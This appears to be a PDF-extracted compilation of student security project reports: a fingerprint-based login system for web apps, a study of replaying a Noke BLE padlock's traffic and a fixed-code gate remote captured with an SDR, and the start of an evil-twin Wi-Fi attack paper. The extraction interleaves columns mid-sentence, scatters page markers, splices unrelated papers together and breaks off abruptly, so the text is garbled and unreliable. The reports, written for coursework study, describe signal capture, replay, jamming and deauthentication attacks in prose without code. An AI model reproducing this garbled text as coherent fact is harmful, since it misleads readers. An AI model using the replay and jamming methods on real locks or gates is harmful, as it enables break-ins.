https://www.consumerbarometer.com/en/graph-
builder/?question=M1&filter=country:singapore
[2] B.T Ulery, R.A Hicklin, J.A Buscalia, M.A Robertson. 2010.
Accuracy and Reliability of Forensic Latent Fingerprint Decisions [6] https://en.wikipedia.org/wiki/YubiKey
gp06
PDFsam_merge 42
46
APPENDIX
gp06
PDFsam_merge 43
47
PDFsam_merge 48
Fingerprint Authentication System for Web Applications
ABSTRACT Passwords however have been broken time and time again through
means such as Bruteforcing or using of Rainbowtables and even
In this paper, we aim to explore the implementation and feasibility social engineering. As computers get faster, it will take less time
of a verification system for web applications that utilises biometric for a particular password to be cracked. In order to overcome this,
verification technology as an addition to the traditional username security systems have introduced Multi factor authentication
and password system that has already been widely implemented. (MFA), the most common of which is the two factor authentication
While the traditional method of authentication with passwords (2FA). Most 2FA systems take from at least 2 of the following
have proven to be sufficient in the past, the proliferation of modern categories knowledge (something they know), possession
technology entails greater security risks and necessitates an (something they have), and inherence (something they are)[2].
improvement in the security systems that protect our valuable data. However with these improvements comes the cost of an extra step.
We also discuss how, this biometric verification service functions Not only that, the adoption of 2FA is not widely enforced.
to provide a supplementary layer of security and how it is
comparably more convenient for users who are owners of In our project, our aim is to create a security system which is
smartphones with fingerprint scanners. We will also be analyzing universal thus easy to implement which at the same time provides
the vulnerabilities of the current system in comparison to the good security that matches today's required standards.
proposed system, as well as the practicality of the proposed system
in a realistic environment.
2. BACKGROUND
2.1 Biometric Authentication
Categories and Subject Descriptors
In any secure system, user identification and authentication is a
critical aspect of access control and should be examined in greater
detail. Traditionally, user authentication is performed based on
General Terms
something the user knows (i.e. password, security questions) or
Passwords, Two Factor Authentication, Security something the user has (i.e. smartphone, token, magnetic card)[16].
However, the username-password paradigm are inherently weak
due to a number of flaws. Firstly, since username is only required
Keywords to be unique rather than secret, username typically are chosen in
Biometric, 2FA, TouchID, Chrome Extension, GoFinger the form of the user’s initial and last name (Donald Trump might
have “dtrump” as his username), a hacker can easily guess a
person’s username using social network sites such as facebook and
1. INTRODUCTION linkedin. On the other hand, the strength of the password is reliant
Passwords have been used in securing systems even before on user behaviour, a sufficiently long and strong password is
computers were invented. They have been used to gain access to unlikely to be cracked but it is also hard for user to remember.
exclusive clubs and societies or even used to identify spies from According to a study done by keeper-security in 2016[4], about
allies during times of war. The modern day computed password 17% percent of user still use “123456” as their password, and a
was invented by Fernando Corbato[1] in the early 1960’s. huge amount of people uses dictionary words as their password and
gp07
PDFsam_merge 45
49
uses the same password for multiple applications. The rise of authentication system. Thus, a potential variant of our system could
password cracking tools such as keyloggers, network sniffers and integrate facial recognition as an authentication system for web
GPU-password cracking rigs make passwords as a main security applications if facial recognition were to be incorporated into
mechanism that much more undesirable. mobile technology on a wide scale.
2.2.2 1Password
1Password is the premium alternative for LastPass. Its intuitive
interface and securities are its competitive advantage. Offering
more than just a web-based product, 1Password is well-adopted for
Figure 1 : Security of Fingerprint Unlock vs. PIN from the perspective of former and current users of its desktop versions for both MacOS and Windows.
Fingerprint Unlock
Figure 2 : Convenience of Fingerprint Unlock vs. PIN from the perspective of former and current
users of Fingerprint Unlock
2.2.3 Browser’s Built-in Keystore
gp07
PDFsam_merge 46
50
is also associated with difficult passwords include reusing the same
password across different accounts, keeping the password as a text
file in the computer or keeping a file containing the password in a
cloud based storage system such as dropbox[10].
Manager Authentication
Method
MFA Delivery
Method
3. FINGERPRINT SECURITY
LastPass Master Password Optional Cloud/Local SYSTEM
1Password Master Password Optional Cloud-based
3.1 Fingerprint Scanner
Browser None No Cloud-based
In the 21st century, the most prevalent form of biometric
Figure 6 : Password Managers Summary
authentication in many mobile devices is the Fingerprint scanner.
The concept of integrating fingerprint authentication with
From the extracted table above, we can deduce that the common
smartphones was introduced by Toshiba in 2007. Six years later, in
way of authenticating a user when he requests for a password login
2013, this technology was further revolutionized by Apple Inc to
is through the use of the Master Password. MFA options can be
become a better and more usable component of a smartphone -
added to send verification codes and texts to the registered mobile
which is widely known as TouchIDTM.
phones & applications for enhanced security. However, the use of a
weak master password or unactivated MFA option would expose
users to the similar vulnerability with higher risk - access to all
credentials.
gp07
PDFsam_merge 47
51
passcode are 1 in 10,000. Although some codes, like “1234,” might 3.3.1 Phone Application (iOS)
be more easily guessed, there is no such thing as an easily The phone application serves the objective to authenticate the user
guessable fingerprint pattern. with its in-built biometric device (i.e. FingerPrint sensor,
TouchID). It will also be used to authenticate One Time Password
TouchID is made more secure with an advanced security (OTP) from our server. The application can be visualized as
architecture called Secure Enclave. It is a chip in the TouchID TouchID on the Macbook Pro in the similar context described
devices, which was developed to protect your passcode and earlier.
fingerprint data. Touch ID doesn't store any images of your
Built on the latest technology of React Native, we harnessed the
fingerprint, and instead relies only on a mathematical
capabilities to scale this form factor to multiple platforms and
representation. It isn't possible for someone to reverse engineer the
access native hardwares such fingerprint sensors. For the purpose
actual fingerprint image from this stored data.
of this study, we will be focusing on the iOS version of the
The fingerprint data is encrypted, stored on device, and protected
application to allow more time for testing and analysis of the
with a key available only to the Secure Enclave. The fingerprint
completed product.
data is used only by the Secure Enclave to verify that the
fingerprint matches the enrolled fingerprint data. It can’t be
accessed by the OS on your device or by any applications running 3.3.2 Chrome Extension
on it. It's never stored on Apple servers, it's never backed up to The key purpose of the chrome extension is to provide the
iCloud or anywhere else, and it can't be used to match against other functionality to detect and extend the ability to authenticate a user
fingerprint databases. when he encounters a login request. The user will be prompted
with additional login method, where it will send a request for
3.2 Implementation password to the secured server and to the phone for biometric
authentication.
For the purpose of this feasibility study, we have adopted the
concept from the latest series of MacBook Pro that offered inbuilt 3.3.3 Web Services
TouchID systems where it authenticates the user with a fingerprint
These web services function as an interface between the chrome
when a login prompt is detected. The solution offered high-level of
extension and phone application, fulfilling requests and sanctioning
biometric security without compromising convenience.[7]
authorization. These web services are only surfed securely through
https request only and requires authenticated auth tokens to make
request to sensitive information.
gp07
PDFsam_merge 48
52
implementation of its chrome extension functionalities in the Upon user clicking the fingerprint, the extension sends a request to
following areas:- the API endpoint and receives the push-notification via
FCM(Firebase Cloud Messaging) once the user has authenticated
3.4.1 Detection of the login form by the in-browser extension his/hers fingerprint via the GoFinger mobile app.
gp07
PDFsam_merge 49
53
minutes. If the user is able to provide the code, we can sufficiently 3.6.2 Login
believe that he has ownership to the mobile number indicated.
3.5.5 Request Flow Users are prompted to save their login credentials with us when
The request flow is activated whenever a request from the chrome he/she login a new site successfully for the first time. These
extension counterpart is made by the user. A prompt to request for credentials are then encrypted with AES256 before being sent over
the the server for safekeeping. No plaintext usernames or
enrolled fingerprint is made. The user must have fingerprints
enrolled and also a fingerprint scanner available on the phone. If passwords are stored on the server.
these conditions are not met, the user will be denied access.
3.6.4 Retrieving Credentials
If the user is unable to verify himself through the fingerprint, he
can request to retry. However, he will not be able to fallback to a
PIN code password for authentication. Disabling the ability for this
fallback helps to prevent unauthorized access to users who may
know the authorized user’s passcode.
When requesting for credentials, the server will return the
Once the authentication is made, the credentials are sent from the encrypted credentials back to the chrome extension after the
server and back to the chrome extension to log the user in. The fingerprint authentication is successful. These credentials are then
success status page will be shown. decrypted by the shared key that the chrome extension stores. The
chrome extension will not store any credential.
3.6 Information Transmission (How secure is it?)
3.6.1 Registering for Account 3.6.5 Auth Token (Session Token)
Each of these request made to the server (from the phone
application/chrome extension) requires an authentication token to
be verified. This auth token is only provided after the OTP is
successfully verified. This token is made valid for 30 days to
ensure freshness in the token. Without the auth token, the server
Registration of account is only made available from the phone will deny all access to any sensitive information.
application. This is because the whole implementation will require
the chrome extension and phone to be paired. Without any of the 3.6.6 Communications
above, the whole authentication process will not work. Removing
All communications between the app/chrome extension to the
unwanted account creation can prevent unauthorized users from
server and from server to database are secured using HTTPS.
causing unwanted issues.
Servers are installed with SSL certifications signed by Comodo.
This ensures that the data transferred are encrypted and secured.
The IMEI hash is stored to the database and used as a shared key to
be later used from encryption and decryption of the user’s
credentials. Storing the hash also prevents the user from using
unauthorized devices. Validation to ensure that the authentication
comes from the correct device is carried out in every transaction. 3.6.7 Server Hardening / Database Hardening
Some of the precautions taken are as listed below.
1. Root Accounts are disabled
2. Password Access are disabled
3. Login only possible through SSH
4. Limit access of IP range to the server only
5. Only allow access to ports in use
gp07
PDFsam_merge 50
54
4. ANALYSIS the same database with the encrypted data. Any exploits on the
database will reveal the key with the encrypted data where hackers
Two sub-teams were formed from our group to represent the can reverse the original credentials.
black-box and white-box hackers. The black-box hackers were
given the functional packaged chrome extension and exported To secure the key better, the next step is the improve the structure
phone application. The white-box hackers were provided both of the database. The vault that holds the credentials should be
source code and the functional applications. separated into multiple instances where the shared key and
The objective of this testing is to analyse the vulnerabilities and credentials are on different databases. Credentials can also be
loopholes that the developers may have overlooked. Vulnerabilities divided into a small chunk where each database is only responsible
and test cases that were reported were patched and reviewed before for a small portion.
iterating the process again.
Therefore, the hacker will be required to hack through these
4.1 Identified Vulnerabilities / Problems secured databases with different authentications before being able
to get hold of the whole credential.
Problem Decryption of credentials at server
Developers decrypted the credentials for testing
5. VULNERABILITIES AND
and did not remove it after development was
completed. POSSIBLE ATTACKS
5.1 Fingerprint Authentication Vulnerabilities
Solution Decryption codes were removed.
The majority of smartphones use a capacitive sensor, which images
Reporter White-box a fingerprint by applying a voltage to a finger and measure it
electrically. Researcher from Michigan State University[11] had
done a proof of concept of forging and bypassing capacitive
Problem Single Point of Failure fingerprint sensor by using a inkjet printer loaded with conductive
ink to print a spoofed fingerprint and successfully bypassed even
If user do not own the mobile number, he will lose
access to all his passwords. the highly regarded Apple’s Touch ID.
Solution Recovery email is included in registration and In addition, due to the small fingerprint sensor on smartphones, it is
verified. unable to capture the entire fingerprint and have to store partial
fingerprint of each finger[12]. This results in significantly less
Reporter Black-box security as compared to a bigger scanner capable of taking a full
fingerprint image as the likelihood of getting a match to 10 images
is higher than a match from a single image.
Problem Push Notification still received after logout
The logout process only clears the user information Apart from the physical limitations and vulnerabilities of the
on the device but do not blocks push notifications fingerprint scanner, there are also attacks that can compromise the
requesting to authenticate software used to authenticate the fingerprint data. For instance, an
attacker may be able to modify the fingerprint authentication
Solution Ensure that the token is revoked on the server and software to output an artificially high matching score such that an
remove the user from listening to updates when the unauthorized user can gain access to the phone without the
user is logged out. fingerprint of an authorized user [13]. Furthermore, the output of
the fingerprint recognition software can also be modified, such that
Reporter Black-box a negative match is overwritten to be a positive match.
4.2 Suggestions (Future Plans) A popular password attack is the brute force attack, which is
As a security authentication feature, this implementation has to be characterized by the generation of all possible combinations to find
secured to garner any trust from the community. The direct a string that matches the password. Typically, brute force attacks
vulnerability we face at the moment is to have the shared key on are used on encrypted passwords, where all possible combinations
gp07
PDFsam_merge 51
55
of the password are generated and encrypted [15]. If the attacker biometric authentication systems become more accurate they will
manages to acquire a password file, it can be matched against the become harder to fool as well.
list of encrypted passwords to find the original password. Brute
force attacks are very time consuming but are particularly effective 7. ACKNOWLEDGMENTS
for small passwords.
We would like to thank Prof Hugh Anderson of National
A variant of the brute force attack is the dictionary attack where University of Singapore for giving us this opportunity to write this
common or frequently occurring words are matched against the paper and providing constant guidance for our project. This
password instead of all possible combinations. While the dictionary research opportunity and his accompanying lectures have
attack is faster than the brute force attack, it is limited in scope and broadened our perspective towards security and to better our
encompasses the possibility that the password may not be in the understanding in the field.
computed dictionary [15].
Another password attack is the replay attack, where an attacker can 8. REFERENCES
insert himself in the middle of the line of communication between
client and server by replaying data packets during the [1] Lisa Eadicicco. 2014. The Man Who Invented The Computer
authentication process. Password Admits That It's Become A Nightmare. (May
2014). Retrieved November 10, 2017 from
http://www.businessinsider.com/inventor-of-the-password-20
Other known password attacks include shoulder surfing, phishing, 14-5
key loggers etc.
[2] Seth Rosenblatt, Jason Cipriani. 2013. Two-factor
authentication: What you need to know (FAQ). (May 2013).
5.3 Password Storage Vulnerabilities Retrieved November 10, 2017 from
https://www.cnet.com/news/two-factor-authentication-what-
Our system allows users to specify the credentials they wish to you-need-to-know-faq/
store at the beginning. It is ideal if they use a very complicated
password or use a random password generator. However, a user [3] Chandrasekhar Bhagavatula, Blase Ur, Kevin Iacovino, Su
Mon Kywe, Lorrie Faith Cranor, and Marios Savvides. 2015.
may still use a simple password such as “password” for his
Biometric Authentication on iPhone and Android: Usability,
account. The credentials are stored in a server that is encrypted Perceptions, and Influences on Adoption. Proceedings 2015
using AES 256. The passwords are also appended with salt prior to Workshop on Usable Security (2015).
encryption before being stored in the database. Therefore the only DOI:http://dx.doi.org/10.14722/usec.2015.23003
effective attack against our system would be bruteforcing and
[4] Darren Guccione. The Most Common Passwords of 2016.
dictionary attacks.
Retrieved November 10, 2017 from
https://keepersecurity.com/public/Most-Common-Passwords-
Ideally authentication and the storage of credentials would be done of-2016-Keeper-Security-Study.pdf
on separate servers, however due to our limited resources we did it
on the same server. [5] K.Brittain, R. Paquet. Determining the cost of a
non-automated help desk. Gartner Research Group; 2003.
gp07
PDFsam_merge 52
56
-are-users-password-security-habits-improving-infographic. Retrieved November 10, 2017 from
https://www.statista.com/statistics/330695/number-of-smartph
[11] Kai Cao and Anil K. Jain. Hacking Mobile Phones Using 2D one-users-worldwide/https://www.statista.com/statistics/3306
Printed Fingerprints, Michigan. 95/number-of-smartphone-users-worldwide/
[12] Aditi Roy, Nasir Memon, and Arun Ross. 2017. MasterPrint: [15] Raza, Mudassar et al. "A Survey Of Password Attacks And
Exploring the Vulnerability of Partial Fingerprint-Based Comparative Analysis On Methods For Secure
Authentication Systems. IEEE Transactions on Information Authentication." World Applied Sciences Journal, 2012,
Forensics and Security 12, 9 (2017), 2013–2025. doi:10.5829/idosi.wasj.2012.19.04.1837.
DOI:http://dx.doi.org/10.1109/tifs.2017.2691658
[16] Matyáš, Václav and Zdeněk Říha. Biometric Authentication -
[13] Umut Uludag and Anil K. Jain. 2004. Attacks on biometric Security and Usability. Advanced Communications and
systems: a case study in fingerprints. Security, Multimedia Security. (2002) Retrieved November 10, 2017
Steganography, and Watermarking of Multimedia Contents from
VI (2004). DOI:http://dx.doi.org/10.1117/12.530907 http://www.fi.muni.cz/usr/matyas/cms_matyas_riha_biometri
cs.pdf
[14] Anon. Number of smartphone users worldwide 2014-2020.
gp07
PDFsam_merge 53
57
9. APPENDIX
Figure 13 : Detailed Phone Application (Finger) Flow
gp07
PDFsam_merge 54
58
gp07
PDFsam_merge 55
59
gp07
PDFsam_merge 56
60
HOME SECURITY
Guo Jiaqi Kowshik Sundararajan Low Yong Siang
National University of Singapore National University of Singapore National University of Singapore
School of Computing School of Computing School of Computing
A0130646L A0132791E A0139392X
a0130646@u.nus.edu kowshik.sundararajan@u.nus.edu e0003277@u.nus.edu
This project aims to look at how secure two of such smart home There are three pairing methods available for BLE secure
devices are by testing if a replay attack would allow adversaries to connections for Bluetooth 4.0:
compromise the security of the devices.
1. Just Works: In Just Works, the TK is always 0. This is
2. BLUETOOTH LOW ENERGY obviously an insecure method. There is no protection against
MITM attacks due to the lack of authentication between the
2.1 What is Bluetooth Low Energy? two devices. [3]
Bluetooth Low Energy (BLE), also known as Bluetooth Smart, is a
subset of classic Bluetooth and was introduced as part of the
2. Passkey: In Passkey, the TK is an identical 6-digit number
Bluetooth 4.0 core specification. It is characterised by its low power
between 0 and 999,999. The rest of the key is padded with
gp08
PDFsam_merge 57
61
zeroes. [3] The Passkey method is much more resilient to periodical data exchange of packets between two devices. It is
MITM attacks than Just Works. Initially, a device will therefore inherently private. [14]
generate a 6-digit PIN, and display it to the user. The user of
the other device then enters the same PIN number on that Connections involve two roles:
device to complete the authentication process. However, a Central (Master): A device that repeatedly scans the
brute force attack can crack 6-digit number very quickly. In pre-set frequencies for connectable advertising packets
fact, there are some BLE encryption cracking software, such and, when suitable, initiate a connection. When a
as crackle, that can crack the TK easily. With the TK, crackle peripheral device accepts the request, a connection is
can derive all further keys during the encrypted session that built. The central device starts to message the timing
immediately follows pairing. [4] and initiates the periodical data exchanges.
Peripheral (Slave): A device that sends connectable
3. Out of Band (OOB) pairing: In OOB pairing, the TK is advertising packets periodically and accepts incoming
exchanged via a different wireless technology such as NFC. connections request. [14] Once connected, the
As the most secure out of the three pairing methods, the BLE peripheral device follows the central device’s timing
connection can be assumed to be immune to passive and exchanges data regularly with it.
eavesdropping and MITM attacks if the OOB channel is
secure. [2] The biggest advantage of connections, as compared to
broadcasting, is the ability to organize data by using additional
2.3 BLE Communication protocol layers, and more specifically Generic Attribute Profiles
Bluetooth Low Energy allows nearby devices to communicate in
(GATT), to make each field or attribute more fine-grained
two different ways: Broadcasting and Connections. These two
controlled. [14] Generic Attribute Profiles (GATT) is a server-
mechanisms are subject to the Generic Attribute Profile (GAP)
client protocol. The main job of GATT server is to store
which decides how two BLE devices communicate with each
attributes, and make the attributes available when the client makes
other.
a request. A client can read and/or write attributes found in the
2.3.1 Broadcasting GATT server once it sends a request to the GATT server. [13]
Devices do not have to explicitly connect to each other to transfer
data. Using connectionless broadcasting, data can be sent out to 2.4 BLE in Home IoT Security
any scanning device or receiver in listening range. [14] As Increasingly, as smart homes become more popular, traditional
illustrated in Figure 1, broadcasting allows you to send out your deadbolts are slowly being replaced by smart locks which allow
data one-way to anyone that can receive the transmitted data. home users the convenience of unlocking their door with their
phones instead of the traditional key. With added convenience,
some of these locks allow the user to send the digital keys to anyone
or even unlock their door from anywhere in the world, as long as
there is connectivity. For close distance authentication of the home
owner, or authorized guests, these locks make use of Bluetooth
Low Energy to communicate.
2.5 Noke
Noke is a keyless smart padlock that can be unlocked by a smart
phone that has the Noke app installed. It connects to the user’s
smartphone through Bluetooth Low Energy, which uses a 128-bit
AES CCM Encryption securing all communication between Noke
and the smartphone, and has been claimed to use PKI technology
Figure 1. Broadcast topology and cryptographic key exchange protocol. On top of software
security, Noke has a boron hardened steel shackle with the latest
There are two roles in this mechanism: anti-shim technology to ensure mechanical hardware security. The
Broadcaster: A device that broadcasts public Noke app also has other features such as allowing the owner to
advertising data packets to anyone who would like to share and revoke access to the lock and allowing the owner to know
receive them. [13] when, where and by whom the locks were accessed.
Observer: A devices that listens to the data in the
advertising packets sent by the broadcaster. [13] 2.6 BLE Sniffing Hardware
In order to see what is going on to the naked human eye, we make
The advantage of Broadcasting is that it is fast and easy to use. It use of the Adafruit BLE sniffer and Wireshark to capture and
will be a good choice if only small amounts of data need to be analyse the Bluetooth Low Energy packets that are transmitted
pushed on a fixed schedule or to multiple devices. However, the from the smartphone to the Noke lock.
major problem of broadcasting is the lack of security and privacy.
Any device within the listening range is able to receive the data. 2.6.1 Adafruit BLE Sniffer
Therefore this mechanism is only suitable for the transmission of Adafruit BLE Sniffer is an adapter which is programmed with a
insensitive data. custom firmware from Nordic Semiconductors to be an easy-to-use
Bluetooth Low Energy Sniffer. It is able to passively capture BLE
packets and data exchanges between two Bluetooth Low Energy
2.3.2 Connections enabled devices, which in our case, would be the Noke padlock and
Devices have to explicitly connect to each other and handshake an Android phone running the Noke application.
with each other to transfer data. Connections allow devices to
transmit data in both directions. A connection is a permanent,
gp08
PDFsam_merge 58
62
The packets captured by the sniffer can be visualised using an open encrypted. This second packet was actually repeated when the
source packet analysis tool such as Wireshark with useful padlock was “re-unlocked” within the same app session. The value
descriptors so that every packet makes sense. There are a couple of only changed when the lock disconnected and reconnected with the
tools a user can use to start sniffing for BLE packets: application re-opened and the cycle restarted from Packet 1.
For Windows users: The official Nordic’s nRF Sniffer Utility
application which is a command line interface.
For Macintosh users: The open source application ble-sniffer-osx.
For Linux users: Adafruit provides a python binding software
which does the same thing.
Ultimately, all these software will be able to output the file to
a .pcap file which can then be used with Wireshark to remotely
analyse the packets captured.
2.7 Experiment
2.7.1 Preliminary Findings
Initially, it was tough latching onto the channel which Noke was
advertising on since one of its BLE characteristics was to hop
between 3 different channels during advertisement. Once we
managed to get the Adafruit sniffer to hook onto a channel, it
continued to monitor the connection between the master (Android
phone) and slave (Noke).
Following that, the third meaningful packet received was a
The first few packets after the connection request looked notification from the padlock back to the Android phone with a
unencrypted as there were no Control Opcode: handle of 0x000b.
LL_START_ENC_REQ packets. It made sense that there was no
encryption on the Bluetooth link layer as there was no pairing
request during the first set-up. Subsequent packets were not
encrypted on the link layer. Hence, we further analysed the packets
after the connection request.
gp08
PDFsam_merge 59
63
We then tried to decrypt the packet which we’ve discovered during
our sniffing attempts and then came back with the following results.
The packet header / type seemed to be similar and not changed
From the analysis, it seemed as though there was some handshake
when compared to the other researcher findings. The thing which
happening within Packets 2 and 3 and the 4th packet was making
is different now is that the payload formatting seems to be different,
use of the handshake secret to send over the unlock padlock
hence we infer that there might be some logic change within the
command. Since the values did not change when we tried to unlock
code base.
the padlock a few times, we suspected that there was probably some
mechanism within the application layer that was doing the
encryption, decryption and setting up the unlock session.
Therefore, replaying the value did not do much to the lock
unfortunately.
3. Radio Frequency
Radio frequency is any of the electromagnetic wave frequencies
that lie in the range extending from around 3kHz to 300 GHz. From
planes in the skies, to just the FM radio that transmit radio stations
broadcast to your automobile, radio frequency is used in almost
everywhere. Given its capability of transmitting long distance,
radio frequency is a cheap and effective way to transmit data and
for devices to communicate.
gp08
PDFsam_merge 60
64
3.1 Security in Radio Spectrum 3.3 Replay Attack
However, radio frequency is lacking in security. With the right
tools, that do not cost a lot, anyone is able to download the relevant 3.3.1 Sniffing and Decoding the signal
programs such as GQRX or SDR# and start listening on these Since we had the actual hardware remote on hand, we did not need
invisible signals. to sit around and listen to the whole range of frequency before
identifying the frequency band of which the remote is
Some home devices use these signals to communicate with each communicating on. Opening up the outer plastic case of the remote,
other, such as a wireless doorbell while some other devices use we found out that the remote is communicating on a 330MHz
these signals to authenticate the owner for their entry, like a sliding frequency band. Confirming with the SDR, we set the frequency to
gate in most private homes. In this project, we will be studying the 330MHz and indeed we get a signal when the remote was pressed
latter case; that is, the radio frequency used in the operation of as shown in the diagram below
sliding gates in homes.
3.2 Terminology
First of all, modulation: it is a process of varying one or more
properties of a periodic waveform, also known as a carrier signal,
with a modulating signal that typically contains information to be
transmitted. These are some different modulations [9]:
1. Amplitude modulation (AM): The height (or the amplitude)
of the signal carrier is varied to represent the data.
2. Frequency modulation (FM): Contrasting with AM, the
amplitude does not change and the varying instantaneous
frequency of the carrier waveform reflects the data. For
example, a higher frequency of the waveform represents a
binary one, while a lower frequency represents a binary zero.
3. Phase modulation (PM): Similar but not the same as FM,
phase modulation varies the frequency of the carrier waveform
to reflect changes in the frequency of the data.
4. Polarization modulation: Angle of rotation of an optical
carrier signal is varied to reflect transmitted data.
5. Pulse-code modulation: Method to convert analogue signals We were able to view the waveform using audio editing software
to digital ones so that the digital signals can be transmitted such as Audacity to decode the signal manually. As we compared
through digital communication. the waveform file, we found that the signal was repetitive and
6. Pulse-width modulation: A modulation technique used to identical. This meant that the sliding gate was making use of a fixed
encode a message into a pulsing signal. code remote control, that is, the code sent out was always the same,
which was susceptible to replay attacks.
Secondly, given a large range of frequency that the device can take,
it is important to know which frequency the device is Apart from decoding manually, we got to know of a tool, rtl_433
communicating on. A frequency band is an interval in the that allows us to use the SDR to tune into the frequency we wanted
frequency domain, delimited by a lower frequency and an upper and listen in on to that signal while the program helps us to decode
frequency. In Singapore, the Info-Communications Media the signal. Using rtl_433 (with the -f flag and -A flag), we managed
Development Authority is in charge and takes care of the frequency to decode the signal received by the SDR. The image below shows
allocation and assignment. [8] the screenshot of the signal captured using the SDR and then passed
through the rtl_433 program.
There are two main types of ways radio frequency is transmitted in
a remote control: fixed code or rolling code. Both fixed code and
rolling code share this in common, that is, they send out a code, and
if code is the same as the one expected from the receiver, the
receiver actuates the relay and operates the hardware, be it a lock
or a gate motor. However, the main difference is this: remote
controls with a fixed code will always send out the same signal
code, while ones with rolling code will send out a unique code
every time, in an attempt to prevent replay attacks.
gp08
PDFsam_merge 61
65
As you can see, the signals that were being received by the SDR The following shows the connection diagram of the add-on and our
were always the same, exposing the underlying fixed code implementation based on socket programming:
mechanism implemented in the gate system. If we were to study the
waveform of the .wav file that was being recorded in GQRX, we
would be able to spot repetitive patterns of the waveform.
The adversary can jam the signal around the receiver with radio
noise so that the first signal is unable to unlock the sliding gate.
When the user is unable to unlock the sliding gate on the first press,
the user would press the remote again. As the jamming device is
programmed to record and jam that second signal, while replaying
the first signal, the gate will be unlocked. At any point in time,
when the device detected a new signal, it jams that signal and replay 5. ACKNOWLEDGMENTS
the previous signal to unlock the gate. The adversary would be able We would like to extend our gratification to Prof Hugh Anderson
to retrieve the jamming device with a stored rolling code to conduct for his continuous guidance and support throughout this project. He
a replay attack at any time he chooses. has been very helpful in loaning us the equipment needed for this
project.
4. ADD ON PROTOTYPE FOR GATE
As mentioned earlier, the current implementation of the sliding gate 6. REFERENCES
security is not sufficient, be it fixed code or rolling code [1] Encryption Key Generation and Distribution. (2017).
implementation. As the remote simply provides the signal for the Teledyne Lecroy Everywhereyoulook. Retrieved 10
receiver to match and actuate the relay, any device capable of November 2017, from
receiving any signal and analysing them for matches would be able https://www.fte.com/webhelp/sodera/Content/Documentation
to toggle the switch to high or low in software, rotating the gear in /WhitePapers/BTLE/EncryptionKeyGenerationAndDistributi
the process. Thus, we propose an idea of providing an add on for on.htm
the existing sliding gate security that is an improvement on the [2] Bon, M. (2017). A Basic Introduction to BLE Security –
existing system but does not cost much to change. Wireless – eewiki. Eewiki.net. Retrieved 10 November 2017,
from
Going away from radio frequency, we looked into Raspberry Pi, a https://eewiki.net/display/Wireless/A+Basic+Introduction+to
computing device that can be programmed to do almost anything. +BLE+Security#ABasicIntroductiontoBLESecurity-
Furthermore, as the Raspberry Pi is a programmable device, further SecurityIssuesFacingBLE
advancement can be made to allow it to communicate and automate [3] Balmus, A. (2017). Bluetooth Low Energy SMP Pairing |
the sliding gate, possible ideas of which will be discussed in the NXP Community. Community.nxp.com. Retrieved 10
appendix. November 2017, from
https://community.nxp.com/thread/332191
gp08
PDFsam_merge 62
66
[4] Crackle, crack Bluetooth Smart (BLE) encryption. (2017) 2017, from
Lacklustre.net. Retrieved 10 November 2017, from http://searchnetworking.techtarget.com/definition/modulation
https://lacklustre.net/projects/crackle/ [10] Tutorial: Replay Attack with an RTL-SDR, Raspberry Pi and
[5] Townsend, K. (n.d.). Introduction to Bluetooth Low Energy: RPiTX. (2017). Rtl-sdr.com. Retrieved 10 November 2017,
GATT. Retrieved 10 November 2017, from from
https://learn.adafruit.com/introduction-to-bluetooth-low- http://www.rtl-sdr.com/tutorial-replay-attacks-with-an-rtl-
energy/gatt sdr-raspberry-pi-and-rpitx/
[6] Milovanovic, V. (2017) Bluetooth Low Energy – Part 1: [11] Pasknel, V. (2017). Hacking the Nokē Padlock – Morphus
Introduction to BLE – MikroElektronika Learn. Labs. Morphus Labs. Retrieved 19 November 2017, from
MikroElektronika Learn. Retrieved 10 November 2017, from https://morphuslabs.com/hacking-the-nok%C4%93-padlock-
https://learn.mikroe.com/bluetooth-low-energy-part-1- adfe7b1b5617
introduction-ble/ [12] Mustaqiim, M. (2017). Noke Packet Capture.
[7] 1, L. (2017). What’s The Difference Between Bluetooth Low https://github.com/YongSiang94/GateSecurity/blob/master/N
Energy And ANT? Electronic Design. Retrieved 10 oke/Noke%20Packet%20Capture/NOKE(YS7).pcap
November 2017, from [13] Punch Through. (2017). Punchthrough.com. Retrieved 19
https://www.electronicdesign.com/mobile/what-s-difference- November 2017, from
between-bluetooth-low-energy-and-ant https://punchthrough.com/bean/docs/guides/everything-
[8] Infocomm Media Development Authority (3 November else/how-gap-and-gatt-work/
2017). Frequency Allocation & Assignment. Retrieved 10 [14] Getting Started with Bluetooth Low Energy. (2017). O’Reilly
November 2017, from | Safari. Retrieved 19 November 2017, from
https://www.imda.gov.sg/regulations-licensing-and- https://www.safaribooksonline.com/library/view/getting-
consultations/frameworks-and-policies/spectrum- started-with/9781491900550/ch01.html
management-and-coordination/frequency-allocation-and-
assignment
[9] Rouse, M. (2017). What is modulation? –Definition from
WhatIs.com. SearchNetworking. Retrieved 10 November
gp08
PDFsam_merge 63
67
PDFsam_merge 68
Exploration of the evil twin attack on Wi-Fi access points
and countermeasure
1. INTRODUCTION 2. MAN-IN-THE-MIDDLE
In any place in the city, when we scan for available Wi-Fi A man-in-the-middle (MiTM) is a type of attack where a
networks on our devices we get a long list of networks, malicious user M monitors the communication between
some are protected, while others are not. Most of us would two users A and B. Both A and B think they are directly
have the experience of trying to connect to any of the open connected to each other, while in fact M is receiving all
networks hoping for free internet connection. For example the messages from A to B and from B to A, and redirects
in Singapore there are more than 3500 unsecured access it to B or to A. If this communication is not encrypted, the
points provided by the government [3]. At home, we are malicious user has access to all the private data
used to connect to our own protected Wi-Fi from our transmitted, and has a possibility of sending evil messages
mobile devices. But how do we ever know that the instead of just redirecting the conversation.
networks we connect to are what they claim to be ? In this
project, we attempt to explore various techniques to 2.1 MiTM on Open AP
actively gain a man-in-the-middle position between a Wi-
Fi AP (we will extensively use the term AP in this report
as a shorthand for access point) and its users after the
connection between them is already established (whether
protected or not). Hoping that a user connect to an evil AP
by himself is more related to social engineering and is thus
gp09
PDFsam_merge 65
69
allows the attacker to exploit a vulnerability in the WPA2
4-way handshake.
3. VULNERABILITIES AND
EXPLOITS
In this section we will describe various vulnerabilities of
Figure 1. MiTM on Open AP
wireless devices and the protocol they currently use and
In the case of an open Wi-Fi (unprotected or WPA2 then combine those in order to perform a MiTM attack.
encrypted with known key), A client (a mobile phone or a
laptop say) is connected to the legitimate AP, which is the 3.1 Frames
gateway router and thus provides a connection to the rest
The Wi-Fi protocol defines various types of frames used
of the network (i.e. to the internet). In this setup we will
by the clients and the access points to communicate. A few
consider a MiTM in the form of a rogue AP which will
examples are the data frame, which encapsulates data
trick client A into thinking that it is the legitimate AP
from higher layers, the beacon frame, which is emitted
using a deauthentication attack that will be thoroughly
periodically by an AP to advertise its presence, or the
described later on. Of course the rogue AP can then itself
deauthentication frame which terminates the
